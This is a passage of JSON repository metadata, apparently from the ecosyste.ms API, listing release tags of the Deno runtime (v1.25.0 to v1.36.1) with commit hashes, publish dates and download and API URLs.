7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":